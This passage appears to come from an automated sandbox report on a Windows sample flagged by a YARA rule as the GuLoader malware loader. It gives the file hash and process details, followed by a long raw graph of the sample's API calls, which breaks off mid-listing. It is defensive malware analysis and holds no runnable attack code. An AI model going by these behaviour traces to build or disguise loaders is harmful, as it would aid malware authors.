                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:53 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1BveuUmWQYMsD7xKgLGoUA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Target ID:0
                                                                Start time:09:53:47
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Osb7hkGfAb.exe"
                                                                Imagebase:0x400000
                                                                File size:887'424 bytes
                                                                MD5 hash:A09950FD9AF3C4E3FF6F778AB5D8CE0F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2638880242.0000000002A86000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:09:54:51
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Osb7hkGfAb.exe"
                                                                Imagebase:0x400000
                                                                File size:887'424 bytes
                                                                MD5 hash:A09950FD9AF3C4E3FF6F778AB5D8CE0F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2637639337.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                  Execution Graph

                                                                  Execution Coverage:18.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:16.2%
                                                                  Total number of Nodes:1540
                                                                  Total number of Limit Nodes:46
40618a 17 API calls 4252->4253 4253->4252 4254->4081 4255->4087 4267 4041c7 4256->4267 4258 405313 4262 40533a 4258->4262 4270 401389 4258->4270 4259 4041c7 SendMessageA 4260 40534c OleUninitialize 4259->4260 4260->4117 4262->4259 4263->4249 4265 40618a 17 API calls 4264->4265 4266 403c96 SetWindowTextA 4265->4266 4266->4252 4268 4041d0 SendMessageA 4267->4268 4269 4041df 4267->4269 4268->4269 4269->4258 4272 401390 4270->4272 4271 4013fe 4271->4258 4272->4271 4273 4013cb MulDiv SendMessageA 4272->4273 4273->4272 4274->4132 4276 405b53 4275->4276 4277 405b43 4275->4277 4279 405aba CharNextA 4276->4279 4280 405b73 4276->4280 4277->4276 4278 405b4e CharNextA 4277->4278 4278->4280 4279->4276 4280->4135 4280->4136 4282 406481 FindClose 4281->4282 4283 40648c 4281->4283 4282->4283 4283->4142 4285 403883 4284->4285 4286 40384d 4285->4286 4287 403888 FreeLibrary GlobalFree 4285->4287 4288 4058bf 4286->4288 4287->4286 4287->4287 4289 405b7d 18 API calls 4288->4289 4290 4058df 4289->4290 4291 4058e7 DeleteFileA 4290->4291 4292 4058fe 4290->4292 4296 403667 OleUninitialize 4291->4296 4293 405a2c 4292->4293 4328 4060f7 lstrcpynA 4292->4328 4293->4296 4301 40646b 2 API calls 4293->4301 4295 405924 4297 405937 4295->4297 4298 40592a lstrcatA 4295->4298 4296->3977 4296->3978 4300 405ad6 2 API calls 4297->4300 4299 40593d 4298->4299 4302 40594b lstrcatA 4299->4302 4304 405956 lstrlenA FindFirstFileA 4299->4304 4300->4299 4303 405a50 4301->4303 4302->4304 4303->4296 4305 405a54 4303->4305 4304->4293 4311 40597a 4304->4311 4306 405a8f 3 API calls 4305->4306 4308 405a5a 4306->4308 4307 405aba CharNextA 4307->4311 4309 405877 5 API calls 4308->4309 4310 405a66 4309->4310 4312 405a80 4310->4312 4313 405a6a 4310->4313 4311->4307 4316 405a0b FindNextFileA 4311->4316 4325 4059cc 4311->4325 4329 4060f7 lstrcpynA 4311->4329 4315 40521e 24 API calls 4312->4315 4313->4296 4317 40521e 24 API calls 4313->4317 4315->4296 4316->4311 4318 405a23 FindClose 4316->4318 4319 405a77 4317->4319 
4318->4293 4320 405ed6 36 API calls 4319->4320 4323 405a7e 4320->4323 4322 4058bf 60 API calls 4322->4325 4323->4296 4324 40521e 24 API calls 4324->4316 4325->4316 4325->4322 4325->4324 4326 40521e 24 API calls 4325->4326 4327 405ed6 36 API calls 4325->4327 4330 405877 4325->4330 4326->4325 4327->4325 4328->4295 4329->4311 4338 405c6b GetFileAttributesA 4330->4338 4333 4058a4 4333->4325 4334 405892 RemoveDirectoryA 4336 4058a0 4334->4336 4335 40589a DeleteFileA 4335->4336 4336->4333 4337 4058b0 SetFileAttributesA 4336->4337 4337->4333 4339 405883 4338->4339 4340 405c7d SetFileAttributesA 4338->4340 4339->4333 4339->4334 4339->4335 4340->4339 4342 405db2 GetShortPathNameA 4341->4342 4343 405d8c 4341->4343 4345 405ed1 4342->4345 4346 405dc7 4342->4346 4368 405c90 GetFileAttributesA CreateFileA 4343->4368 4345->4173 4346->4345 4348 405dcf wsprintfA 4346->4348 4347 405d96 CloseHandle GetShortPathNameA 4347->4345 4349 405daa 4347->4349 4350 40618a 17 API calls 4348->4350 4349->4342 4349->4345 4351 405df7 4350->4351 4369 405c90 GetFileAttributesA CreateFileA 4351->4369 4353 405e04 4353->4345 4354 405e13 GetFileSize GlobalAlloc 4353->4354 4355 405e35 4354->4355 4356 405eca CloseHandle 4354->4356 4357 405d08 ReadFile 4355->4357 4356->4345 4358 405e3d 4357->4358 4358->4356 4370 405bf5 lstrlenA 4358->4370 4361 405e54 lstrcpyA 4364 405e76 4361->4364 4362 405e68 4363 405bf5 4 API calls 4362->4363 4363->4364 4365 405ead SetFilePointer 4364->4365 4366 405d37 WriteFile 4365->4366 4367 405ec3 GlobalFree 4366->4367 4367->4356 4368->4347 4369->4353 4371 405c36 lstrlenA 4370->4371 4372 405c3e 4371->4372 4373 405c0f lstrcmpiA 4371->4373 4372->4361 4372->4362 4373->4372 4374 405c2d CharNextA 4373->4374 4374->4371 4896 4038c8 4897 4038d3 4896->4897 4898 4038d7 4897->4898 4899 4038da GlobalAlloc 4897->4899 4899->4898 4903 401fcb 4904 402bce 17 API calls 4903->4904 4905 401fd2 4904->4905 4906 40646b 2 API calls 4905->4906 4907 401fd8 4906->4907 4908 401fea 4907->4908 4910 406055 wsprintfA 
4907->4910 4910->4908 4396 4014d6 4397 402bac 17 API calls 4396->4397 4398 4014dc Sleep 4397->4398 4400 402a5a 4398->4400 4911 6ff810e0 4920 6ff8110e 4911->4920 4912 6ff811c4 GlobalFree 4913 6ff812ad 2 API calls 4913->4920 4914 6ff811c3 4914->4912 4915 6ff811ea GlobalFree 4915->4920 4916 6ff81266 2 API calls 4919 6ff811b1 GlobalFree 4916->4919 4917 6ff81155 GlobalAlloc 4917->4920 4918 6ff812d1 lstrcpyA 4918->4920 4919->4920 4920->4912 4920->4913 4920->4914 4920->4915 4920->4916 4920->4917 4920->4918 4920->4919 4413 401759 4414 402bce 17 API calls 4413->4414 4415 401760 4414->4415 4416 401786 4415->4416 4417 40177e 4415->4417 4454 4060f7 lstrcpynA 4416->4454 4453 4060f7 lstrcpynA 4417->4453 4420 401791 4422 405a8f 3 API calls 4420->4422 4421 401784 4424 4063d2 5 API calls 4421->4424 4423 401797 lstrcatA 4422->4423 4423->4421 4446 4017a3 4424->4446 4425 40646b 2 API calls 4425->4446 4426 4017e4 4427 405c6b 2 API calls 4426->4427 4427->4446 4429 4017ba CompareFileTime 4429->4446 4430 40187e 4432 40521e 24 API calls 4430->4432 4431 401855 4433 40521e 24 API calls 4431->4433 4450 40186a 4431->4450 4435 401888 4432->4435 4433->4450 4434 4060f7 lstrcpynA 4434->4446 4436 4030d8 31 API calls 4435->4436 4437 40189b 4436->4437 4438 4018af SetFileTime 4437->4438 4440 4018c1 CloseHandle 4437->4440 4438->4440 4439 40618a 17 API calls 4439->4446 4441 4018d2 4440->4441 4440->4450 4442 4018d7 4441->4442 4443 4018ea 4441->4443 4444 40618a 17 API calls 4442->4444 4445 40618a 17 API calls 4443->4445 4447 4018df lstrcatA 4444->4447 4448 4018f2 4445->4448 4446->4425 4446->4426 4446->4429 4446->4430 4446->4431 4446->4434 4446->4439 4449 405813 MessageBoxIndirectA 4446->4449 4452 405c90 GetFileAttributesA CreateFileA 4446->4452 4447->4448 4448->4450 4451 405813 MessageBoxIndirectA 4448->4451 4449->4446 4451->4450 4452->4446 4453->4421 4454->4420 4921 401959 4922 402bac 17 API calls 4921->4922 4923 401960 4922->4923 4924 402bac 17 API calls 4923->4924 4925 40196d 4924->4925 4926 402bce 17 
API calls 4925->4926 4927 401984 lstrlenA 4926->4927 4929 401994 4927->4929 4928 4019d4 4929->4928 4933 4060f7 lstrcpynA 4929->4933 4931 4019c4 4931->4928 4932 4019c9 lstrlenA 4931->4932 4932->4928 4933->4931 4934 6ff82be3 4935 6ff82bfb 4934->4935 4936 6ff81534 2 API calls 4935->4936 4937 6ff82c16 4936->4937 4938 40535c 4939 405507 4938->4939 4940 40537e GetDlgItem GetDlgItem GetDlgItem 4938->4940 4942 405537 4939->4942 4943 40550f GetDlgItem CreateThread CloseHandle 4939->4943 4983 4041b0 SendMessageA 4940->4983 4945 405586 4942->4945 4946 40554d ShowWindow ShowWindow 4942->4946 4948 405565 4942->4948 4943->4942 4944 4053ee 4949 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4944->4949 4953 4041e2 8 API calls 4945->4953 4985 4041b0 SendMessageA 4946->4985 4947 4055c0 4947->4945 4958 4055cd SendMessageA 4947->4958 4948->4947 4951 405575 4948->4951 4952 405599 ShowWindow 4948->4952 4956 405463 4949->4956 4957 405447 SendMessageA SendMessageA 4949->4957 4986 404154 4951->4986 4954 4055b9 4952->4954 4955 4055ab 4952->4955 4960 405592 4953->4960 4962 404154 SendMessageA 4954->4962 4961 40521e 24 API calls 4955->4961 4963 405476 4956->4963 4964 405468 SendMessageA 4956->4964 4957->4956 4958->4960 4965 4055e6 CreatePopupMenu 4958->4965 4961->4954 4962->4947 4967 40417b 18 API calls 4963->4967 4964->4963 4966 40618a 17 API calls 4965->4966 4968 4055f6 AppendMenuA 4966->4968 4969 405486 4967->4969 4970 405614 GetWindowRect 4968->4970 4971 405627 TrackPopupMenu 4968->4971 4972 4054c3 GetDlgItem SendMessageA 4969->4972 4973 40548f ShowWindow 4969->4973 4970->4971 4971->4960 4975 405643 4971->4975 4972->4960 4974 4054ea SendMessageA SendMessageA 4972->4974 4976 4054a5 ShowWindow 4973->4976 4978 4054b2 4973->4978 4974->4960 4977 405662 SendMessageA 4975->4977 4976->4978 4977->4977 4980 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4977->4980 4984 4041b0 SendMessageA 4978->4984 4981 4056a1 SendMessageA 4980->4981 4981->4981 4982 4056c3 GlobalUnlock 
SetClipboardData CloseClipboard 4981->4982 4982->4960 4983->4944 4984->4972 4985->4948 4987 404161 SendMessageA 4986->4987 4988 40415b 4986->4988 4987->4945 4988->4987 4989 40275d 4990 402763 4989->4990 4991 402a5a 4990->4991 4992 40276b FindClose 4990->4992 4992->4991 4993 401a5e 4994 402bac 17 API calls 4993->4994 4995 401a67 4994->4995 4996 402bac 17 API calls 4995->4996 4997 401a0e 4996->4997 4998 40495e 4999 40498a 4998->4999 5000 40496e 4998->5000 5002 404990 SHGetPathFromIDListA 4999->5002 5003 4049bd 4999->5003 5009 4057f7 GetDlgItemTextA 5000->5009 5005 4049a0 5002->5005 5006 4049a7 SendMessageA 5002->5006 5004 40497b SendMessageA 5004->4999 5008 40140b 2 API calls 5005->5008 5006->5003 5008->5006 5009->5004 5010 4029de 5011 406500 5 API calls 5010->5011 5012 4029e5 5011->5012 5013 402bce 17 API calls 5012->5013 5014 4029ee 5013->5014 5017 402a2a 5014->5017 5020 40614a 5014->5020 5016 4029fc 5016->5017 5024 406134 5016->5024 5021 406155 5020->5021 5022 406178 IIDFromString 5021->5022 5023 406171 5021->5023 5022->5016 5023->5016 5027 406119 WideCharToMultiByte 5024->5027 5026 402a1d CoTaskMemFree 5026->5017 5027->5026 5028 4027df 5029 402bce 17 API calls 5028->5029 5031 4027ed 5029->5031 5030 402803 5032 405c6b 2 API calls 5030->5032 5031->5030 5033 402bce 17 API calls 5031->5033 5034 402809 5032->5034 5033->5030 5056 405c90 GetFileAttributesA CreateFileA 5034->5056 5036 402816 5037 402822 GlobalAlloc 5036->5037 5038 4028bf 5036->5038 5039 4028b6 CloseHandle 5037->5039 5040 40283b 5037->5040 5041 4028c7 DeleteFileA 5038->5041 5042 4028da 5038->5042 5039->5038 5057 403300 SetFilePointer 5040->5057 5041->5042 5044 402841 5045 4032ea ReadFile 5044->5045 5046 40284a GlobalAlloc 5045->5046 5047 402894 5046->5047 5048 40285a 5046->5048 5049 405d37 WriteFile 5047->5049 5050 4030d8 31 API calls 5048->5050 5051 4028a0 GlobalFree 5049->5051 5055 402867 5050->5055 5052 4030d8 31 API calls 5051->5052 5054 4028b3 5052->5054 5053 40288b GlobalFree 5053->5047 5054->5039 
5055->5053 5056->5036 5057->5044 4663 4023e0 4664 402bce 17 API calls 4663->4664 4665 4023f1 4664->4665 4666 402bce 17 API calls 4665->4666 4667 4023fa 4666->4667 4668 402bce 17 API calls 4667->4668 4669 402404 GetPrivateProfileStringA 4668->4669 5058 4028e0 5059 402bac 17 API calls 5058->5059 5060 4028e6 5059->5060 5061 402925 5060->5061 5062 40290e 5060->5062 5071 4027bf 5060->5071 5063 40293f 5061->5063 5064 40292f 5061->5064 5065 402913 5062->5065 5066 402922 5062->5066 5068 40618a 17 API calls 5063->5068 5067 402bac 17 API calls 5064->5067 5072 4060f7 lstrcpynA 5065->5072 5073 406055 wsprintfA 5066->5073 5067->5071 5068->5071 5072->5071 5073->5071 5074 6ff81058 5076 6ff81074 5074->5076 5075 6ff810dc 5076->5075 5077 6ff81091 5076->5077 5087 6ff814bb 5076->5087 5079 6ff814bb GlobalFree 5077->5079 5080 6ff810a1 5079->5080 5081 6ff810a8 GlobalSize 5080->5081 5082 6ff810b1 5080->5082 5081->5082 5083 6ff810b5 GlobalAlloc 5082->5083 5084 6ff810c6 5082->5084 5085 6ff814e2 3 API calls 5083->5085 5086 6ff810d1 GlobalFree 5084->5086 5085->5084 5086->5075 5089 6ff814c1 5087->5089 5088 6ff814c7 5088->5077 5089->5088 5090 6ff814d3 GlobalFree 5089->5090 5090->5077 5091 6ff8225a 5092 6ff822c4 5091->5092 5093 6ff822ee 5092->5093 5094 6ff822cf GlobalAlloc 5092->5094 5094->5092 5095 401b63 5096 402bce 17 API calls 5095->5096 5097 401b6a 5096->5097 5098 402bac 17 API calls 5097->5098 5099 401b73 wsprintfA 5098->5099 5100 402a5a 5099->5100 5101 401d65 5102 401d78 GetDlgItem 5101->5102 5103 401d6b 5101->5103 5104 401d72 5102->5104 5105 402bac 17 API calls 5103->5105 5106 401db9 GetClientRect LoadImageA SendMessageA 5104->5106 5107 402bce 17 API calls 5104->5107 5105->5104 5109 401e1a 5106->5109 5111 401e26 5106->5111 5107->5106 5110 401e1f DeleteObject 5109->5110 5109->5111 5110->5111 5112 4042e6 5113 4042fc 5112->5113 5118 404408 5112->5118 5115 40417b 18 API calls 5113->5115 5114 404477 5116 404541 5114->5116 5117 404481 GetDlgItem 5114->5117 5119 404352 5115->5119 5124 4041e2 8 
API calls 5116->5124 5120 404497 5117->5120 5121 4044ff 5117->5121 5118->5114 5118->5116 5122 40444c GetDlgItem SendMessageA 5118->5122 5123 40417b 18 API calls 5119->5123 5120->5121 5128 4044bd SendMessageA LoadCursorA SetCursor 5120->5128 5121->5116 5129 404511 5121->5129 5145 40419d EnableWindow 5122->5145 5126 40435f CheckDlgButton 5123->5126 5127 40453c 5124->5127 5143 40419d EnableWindow 5126->5143 5149 40458a 5128->5149 5133 404517 SendMessageA 5129->5133 5134 404528 5129->5134 5130 404472 5146 404566 5130->5146 5133->5134 5134->5127 5135 40452e SendMessageA 5134->5135 5135->5127 5137 40437d GetDlgItem 5144 4041b0 SendMessageA 5137->5144 5140 404393 SendMessageA 5141 4043b1 GetSysColor 5140->5141 5142 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5140->5142 5141->5142 5142->5127 5143->5137 5144->5140 5145->5130 5147 404574 5146->5147 5148 404579 SendMessageA 5146->5148 5147->5148 5148->5114 5152 4057d9 ShellExecuteExA 5149->5152 5151 4044f0 LoadCursorA SetCursor 5151->5121 5152->5151 5153 6ff815d1 5154 6ff814bb GlobalFree 5153->5154 5155 6ff815e9 5154->5155 5156 6ff8162f GlobalFree 5155->5156 5157 6ff81604 5155->5157 5158 6ff8161b VirtualFree 5155->5158 5157->5156 5158->5156 4711 40166a 4712 402bce 17 API calls 4711->4712 4713 401671 4712->4713 4714 402bce 17 API calls 4713->4714 4715 40167a 4714->4715 4716 402bce 17 API calls 4715->4716 4717 401683 MoveFileA 4716->4717 4718 401696 4717->4718 4724 40168f 4717->4724 4720 4022e2 4718->4720 4721 40646b 2 API calls 4718->4721 4719 401423 24 API calls 4719->4720 4722 4016a5 4721->4722 4722->4720 4723 405ed6 36 API calls 4722->4723 4723->4724 4724->4719 4725 40216b 4726 402bce 17 API calls 4725->4726 4727 402172 4726->4727 4728 402bce 17 API calls 4727->4728 4729 40217c 4728->4729 4730 402bce 17 API calls 4729->4730 4731 402186 4730->4731 4732 402bce 17 API calls 4731->4732 4733 402193 4732->4733 4734 402bce 17 API calls 4733->4734 4735 40219d 4734->4735 4736 4021df CoCreateInstance 
4735->4736 4737 402bce 17 API calls 4735->4737 4740 4021fe 4736->4740 4742 4022ac 4736->4742 4737->4736 4738 401423 24 API calls 4739 4022e2 4738->4739 4741 40228c MultiByteToWideChar 4740->4741 4740->4742 4741->4742 4742->4738 4742->4739 5159 4022eb 5160 402bce 17 API calls 5159->5160 5161 4022f1 5160->5161 5162 402bce 17 API calls 5161->5162 5163 4022fa 5162->5163 5164 402bce 17 API calls 5163->5164 5165 402303 5164->5165 5166 40646b 2 API calls 5165->5166 5167 40230c 5166->5167 5168 40231d lstrlenA lstrlenA 5167->5168 5172 402310 5167->5172 5170 40521e 24 API calls 5168->5170 5169 40521e 24 API calls 5173 402318 5169->5173 5171 402359 SHFileOperationA 5170->5171 5171->5172 5171->5173 5172->5169 5172->5173 4752 40266d 4753 402bac 17 API calls 4752->4753 4758 402677 4753->4758 4754 4026e5 4755 405d08 ReadFile 4755->4758 4756 4026e7 4761 406055 wsprintfA 4756->4761 4757 4026f7 4757->4754 4760 40270d SetFilePointer 4757->4760 4758->4754 4758->4755 4758->4756 4758->4757 4760->4754 4761->4754 5174 40236d 5175 402374 5174->5175 5178 402387 5174->5178 5176 40618a 17 API calls 5175->5176 5177 402381 5176->5177 5177->5178 5179 405813 MessageBoxIndirectA 5177->5179 5179->5178 5180 4019ed 5181 402bce 17 API calls 5180->5181 5182 4019f4 5181->5182 5183 402bce 17 API calls 5182->5183 5184 4019fd 5183->5184 5185 401a04 lstrcmpiA 5184->5185 5186 401a16 lstrcmpA 5184->5186 5187 401a0a 5185->5187 5186->5187 5188 40296e 5189 402bac 17 API calls 5188->5189 5190 402974 5189->5190 5191 4029af 5190->5191 5192 4027bf 5190->5192 5194 402986 5190->5194 5191->5192 5193 40618a 17 API calls 5191->5193 5193->5192 5194->5192 5196 406055 wsprintfA 5194->5196 5196->5192 5197 4014f4 SetForegroundWindow 5198 402a5a 5197->5198 4798 402476 4799 402bce 17 API calls 4798->4799 4800 402488 4799->4800 4801 402bce 17 API calls 4800->4801 4802 402492 4801->4802 4815 402c5e 4802->4815 4805 402a5a 4806 4024c7 4809 402bac 17 API calls 4806->4809 4811 4024d3 4806->4811 4807 402bce 17 API calls 4808 4024c0 
lstrlenA 4807->4808 4808->4806 4809->4811 4810 4024f5 RegSetValueExA 4813 40250b RegCloseKey 4810->4813 4811->4810 4812 4030d8 31 API calls 4811->4812 4812->4810 4813->4805 4816 402c79 4815->4816 4819 405fab 4816->4819 4820 405fba 4819->4820 4821 4024a2 4820->4821 4822 405fc5 RegCreateKeyExA 4820->4822 4821->4805 4821->4806 4821->4807 4822->4821 5199 402777 5200 40277d 5199->5200 5201 402781 FindNextFileA 5200->5201 5204 402793 5200->5204 5202 4027d2 5201->5202 5201->5204 5205 4060f7 lstrcpynA 5202->5205 5205->5204 5206 401ef9 5207 402bce 17 API calls 5206->5207 5208 401eff 5207->5208 5209 402bce 17 API calls 5208->5209 5210 401f08 5209->5210 5211 402bce 17 API calls 5210->5211 5212 401f11 5211->5212 5213 402bce 17 API calls 5212->5213 5214 401f1a 5213->5214 5215 401423 24 API calls 5214->5215 5216 401f21 5215->5216 5223 4057d9 ShellExecuteExA 5216->5223 5218 401f5c 5219 406575 5 API calls 5218->5219 5221 4027bf 5218->5221 5220 401f76 CloseHandle 5219->5220 5220->5221 5223->5218 4823 401f7b 4824 402bce 17 API calls 4823->4824 4825 401f81 4824->4825 4826 40521e 24 API calls 4825->4826 4827 401f8b 4826->4827 4828 405796 2 API calls 4827->4828 4829 401f91 4828->4829 4830 4027bf 4829->4830 4837 401fb2 CloseHandle 4829->4837 4838 406575 WaitForSingleObject 4829->4838 4833 401fa6 4834 401fb4 4833->4834 4835 401fab 4833->4835 4834->4837 4843 406055 wsprintfA 4835->4843 4837->4830 4839 40658f 4838->4839 4840 4065a1 GetExitCodeProcess 4839->4840 4841 40653c 2 API calls 4839->4841 4840->4833 4842 406596 WaitForSingleObject 4841->4842 4842->4839 4843->4837 5224 401ffb 5225 402bce 17 API calls 5224->5225 5226 402002 5225->5226 5227 406500 5 API calls 5226->5227 5228 402011 5227->5228 5229 402029 GlobalAlloc 5228->5229 5230 402091 5228->5230 5229->5230 5231 40203d 5229->5231 5232 406500 5 API calls 5231->5232 5233 402044 5232->5233 5234 406500 5 API calls 5233->5234 5235 40204e 5234->5235 5235->5230 5239 406055 wsprintfA 5235->5239 5237 402085 5240 406055 wsprintfA 5237->5240 
5239->5237 5240->5230 5241 4018fd 5242 401934 5241->5242 5243 402bce 17 API calls 5242->5243 5244 401939 5243->5244 5245 4058bf 67 API calls 5244->5245 5246 401942 5245->5246 5247 401000 5248 401037 BeginPaint GetClientRect 5247->5248 5249 40100c DefWindowProcA 5247->5249 5250 4010f3 5248->5250 5254 401179 5249->5254 5252 401073 CreateBrushIndirect FillRect DeleteObject 5250->5252 5253 4010fc 5250->5253 5252->5250 5255 401102 CreateFontIndirectA 5253->5255 5256 401167 EndPaint 5253->5256 5255->5256 5257 401112 6 API calls 5255->5257 5256->5254 5257->5256 5258 401900 5259 402bce 17 API calls 5258->5259 5260 401907 5259->5260 5261 405813 MessageBoxIndirectA 5260->5261 5262 401910 5261->5262 5263 404b80 GetDlgItem GetDlgItem 5264 404bd6 7 API calls 5263->5264 5270 404dfd 5263->5270 5265 404c72 SendMessageA 5264->5265 5266 404c7e DeleteObject 5264->5266 5265->5266 5267 404c89 5266->5267 5268 404cc0 5267->5268 5271 40618a 17 API calls 5267->5271 5272 40417b 18 API calls 5268->5272 5269 404edf 5273 404f8b 5269->5273 5278 404df0 5269->5278 5283 404f38 SendMessageA 5269->5283 5270->5269 5293 404e6c 5270->5293 5317 404ace SendMessageA 5270->5317 5276 404ca2 SendMessageA SendMessageA 5271->5276 5277 404cd4 5272->5277 5274 404f95 SendMessageA 5273->5274 5275 404f9d 5273->5275 5274->5275 5285 404fb6 5275->5285 5286 404faf ImageList_Destroy 5275->5286 5294 404fc6 5275->5294 5276->5267 5282 40417b 18 API calls 5277->5282 5280 4041e2 8 API calls 5278->5280 5279 404ed1 SendMessageA 5279->5269 5284 40518b 5280->5284 5298 404ce5 5282->5298 5283->5278 5288 404f4d SendMessageA 5283->5288 5289 404fbf GlobalFree 5285->5289 5285->5294 5286->5285 5287 40513f 5287->5278 5295 405151 ShowWindow GetDlgItem ShowWindow 5287->5295 5291 404f60 5288->5291 5289->5294 5290 404dbf GetWindowLongA SetWindowLongA 5292 404dd8 5290->5292 5303 404f71 SendMessageA 5291->5303 5296 404df5 5292->5296 5297 404ddd ShowWindow 5292->5297 5293->5269 5293->5279 5294->5287 5309 405001 5294->5309 5322 404b4e 
5294->5322 5295->5278 5316 4041b0 SendMessageA 5296->5316 5315 4041b0 SendMessageA 5297->5315 5298->5290 5299 404dba 5298->5299 5302 404d37 SendMessageA 5298->5302 5304 404d75 SendMessageA 5298->5304 5305 404d89 SendMessageA 5298->5305 5299->5290 5299->5292 5302->5298 5303->5273 5304->5298 5305->5298 5307 40510b 5308 405115 InvalidateRect 5307->5308 5311 405121 5307->5311 5308->5311 5310 40502f SendMessageA 5309->5310 5313 405045 5309->5313 5310->5313 5311->5287 5331 404a89 5311->5331 5312 4050b9 SendMessageA SendMessageA 5312->5313 5313->5307 5313->5312 5315->5278 5316->5270 5318 404af1 GetMessagePos ScreenToClient SendMessageA 5317->5318 5319 404b2d SendMessageA 5317->5319 5320 404b25 5318->5320 5321 404b2a 5318->5321 5319->5320 5320->5293 5321->5319 5334 4060f7 lstrcpynA 5322->5334 5324 404b61 5335 406055 wsprintfA 5324->5335 5326 404b6b 5327 40140b 2 API calls 5326->5327 5328 404b74 5327->5328 5336 4060f7 lstrcpynA 5328->5336 5330 404b7b 5330->5309 5337 4049c4 5331->5337 5333 404a9e 5333->5287 5334->5324 5335->5326 5336->5330 5338 4049da 5337->5338 5339 40618a 17 API calls 5338->5339 5340 404a3e 5339->5340 5341 40618a 17 API calls 5340->5341 5342 404a49 5341->5342 5343 40618a 17 API calls 5342->5343 5344 404a5f lstrlenA wsprintfA SetDlgItemTextA 5343->5344 5344->5333 5345 6ff81638 5346 6ff81667 5345->5346 5347 6ff81a98 18 API calls 5346->5347 5348 6ff8166e 5347->5348 5349 6ff81681 5348->5349 5350 6ff81675 5348->5350 5352 6ff816a8 5349->5352 5353 6ff8168b 5349->5353 5351 6ff81266 2 API calls 5350->5351 5356 6ff8167f 5351->5356 5354 6ff816ae 5352->5354 5355 6ff816d2 5352->5355 5357 6ff814e2 3 API calls 5353->5357 5358 6ff81559 3 API calls 5354->5358 5359 6ff814e2 3 API calls 5355->5359 5360 6ff81690 5357->5360 5362 6ff816b3 5358->5362 5359->5356 5361 6ff81559 3 API calls 5360->5361 5363 6ff81696 5361->5363 5364 6ff81266 2 API calls 5362->5364 5365 6ff81266 2 API calls 5363->5365 5366 6ff816b9 GlobalFree 5364->5366 5367 6ff8169c GlobalFree 5365->5367 5366->5356 
5368 6ff816cd GlobalFree 5366->5368 5367->5356 5368->5356 5369 401502 5370 40150a 5369->5370 5372 40151d 5369->5372 5371 402bac 17 API calls 5370->5371 5371->5372 5373 402604 5374 402bce 17 API calls 5373->5374 5375 40260b 5374->5375 5378 405c90 GetFileAttributesA CreateFileA 5375->5378 5377 402617 5378->5377 5379 6ff8103d 5382 6ff8101b 5379->5382 5383 6ff814bb GlobalFree 5382->5383 5384 6ff81020 5383->5384 5385 6ff81027 GlobalAlloc 5384->5385 5386 6ff81024 5384->5386 5385->5386 5387 6ff814e2 3 API calls 5386->5387 5388 6ff8103b 5387->5388 5389 401b87 5390 401b94 5389->5390 5391 401bd8 5389->5391 5394 401c1c 5390->5394 5398 401bab 5390->5398 5392 401c01 GlobalAlloc 5391->5392 5393 401bdc 5391->5393 5395 40618a 17 API calls 5392->5395 5402 402387 5393->5402 5410 4060f7 lstrcpynA 5393->5410 5396 40618a 17 API calls 5394->5396 5394->5402 5395->5394 5399 402381 5396->5399 5408 4060f7 lstrcpynA 5398->5408 5399->5402 5403 405813 MessageBoxIndirectA 5399->5403 5400 401bee GlobalFree 5400->5402 5403->5402 5404 401bba 5409 4060f7 lstrcpynA 5404->5409 5406 401bc9 5411 4060f7 lstrcpynA 5406->5411 5408->5404 5409->5406 5410->5400 5411->5402 4375 402588 4387 402c0e 4375->4387 4378 402bac 17 API calls 4379 40259b 4378->4379 4380 4025a9 4379->4380 4385 4027bf 4379->4385 4381 4025c2 RegEnumValueA 4380->4381 4382 4025b6 RegEnumKeyA 4380->4382 4383 4025de RegCloseKey 4381->4383 4384 4025d7 4381->4384 4382->4383 4383->4385 4384->4383 4388 402bce 17 API calls 4387->4388 4389 402c25 4388->4389 4390 405f7d RegOpenKeyExA 4389->4390 4391 402592 4390->4391 4391->4378 4392 401389 4394 401390 4392->4394 4393 4013fe 4394->4393 4395 4013cb MulDiv SendMessageA 4394->4395 4395->4394 5412 40460d 5413 404639 5412->5413 5414 40464a 5412->5414 5473 4057f7 GetDlgItemTextA 5413->5473 5416 404656 GetDlgItem 5414->5416 5421 4046b5 5414->5421 5418 40466a 5416->5418 5417 404644 5420 4063d2 5 API calls 5417->5420 5423 40467e SetWindowTextA 5418->5423 5428 405b28 4 API calls 5418->5428 5419 404799 5471 
